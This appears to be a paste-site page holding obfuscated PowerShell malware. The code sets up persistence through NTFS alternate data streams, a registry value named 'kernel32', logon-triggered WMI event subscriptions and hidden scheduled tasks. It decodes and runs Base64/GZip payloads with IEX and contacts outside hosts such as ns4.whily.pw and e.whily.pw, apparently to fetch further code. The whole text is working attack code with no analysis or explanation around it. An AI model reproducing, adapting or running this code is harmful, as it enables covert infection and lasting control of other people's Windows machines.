- ${_/=\_/\_/=\_/=\__} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
- if(${_/=\_/\_/=\_/=\__} -gt 2)
- { sc -Path ${/==\_/========\/=} -Value ${/=\/=\/==\/=\_/==} -Stream ${___/===\/==\_/\/\}
- ac -Path ${/==\_/========\/=} -Value ${_/\/\_/\/\_/===\_} -Stream ${___/===\/==\_/\/\}
- }
- else
- { ${__/==\/\_____/\/\} = ${/=\/=\/==\/=\_/==} + "`n" + ${_/\/\_/\/\_/===\_}
- ${/=\/=\____/\_/\__} = ____/=\/==\/\/\_/=(${__/==\/\_____/\/\})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name kernel32 -PropertyType String -Value ${/=\/=\____/\_/\__} -force
- }
- ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${/==\/=\_/===\/=\/}=$('kernel32_Filter'));
- ${_/====\_/=\_/\_/\}=$('kernel32_consumer'));
- gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
- gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
- gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
- ${_/==\_/=\___/\_/=} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __EventFilter -Arguments @{Name = ${/==\/=\_/===\/=\/}; EventNamespace = $('root\CIMV2')); QueryLanguage = $('WQL')); Query = $('Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession''))}
- ${/=\/\/\_/\/=\/==\} = ""
- if(${_/=\_/\_/=\_/=\__} -gt 2)
- { ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)`""}
- ${/=\/\/\_/\/=\/==\} = "IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|out-string)"
- ${__/\__/=\__/=\/=\} = "IEX `$(gc -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\} ^|Out-String)`""
- ${_/\/\/\_/\/=\/=\_} = [System.Text.Encoding]::Unicode.GetBytes(${__/\__/=\__/=\/=\})
- ${/==\______/===\__} = [Convert]::ToBase64String(${_/\/\/\_/\/=\/=\_})
- schtasks.exe /F /create /tn kernel32 /tr "powershell.exe -WindowStyle Hidden -e ${/==\______/===\__}" /sc onidle /i 30
- }
- else
- { ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
- ${/=\/\/\_/\/=\/==\} = "IEX `$((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
- ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`""}
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`"" /sc onidle /i 30
- }
- Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/==\_/=\___/\_/=}; Consumer = ${___/=\__/\/\/=\_/}} | out-null
- if(${_/==\/\__/==\__/\/}){ IEX ${/=\/\/\_/\/=\/==\};
- }
- }
- else
- { if(${_/=\_/\_/=\_/=\__} -gt 2)
- { ${/=\/\/\_/\/=\/==\} = "IEX (Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)"
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
- New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
- }
- else
- { ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
- ${/=\/\/\_/\/=\/==\} = "IEX ((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
- New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
- }
- if(${_/==\/\__/==\__/\/}){IEX "wscript ${_/\_/==\___/==\__}";}
- }
- }
- else
- { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
- IEX "${/=\/=\/==\/=\_/==} `n ${_/\/\_/\/\_/===\_}"
- }}
- _/===\_/\_/====\/\ $('www')) $('www')) $('mail')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
- _/===\_/\_/====\/\ $('ns4.whily.pw')) "vv" $('e.whily.pw')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
- ');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"
Add Comment
Please, Sign In to add comment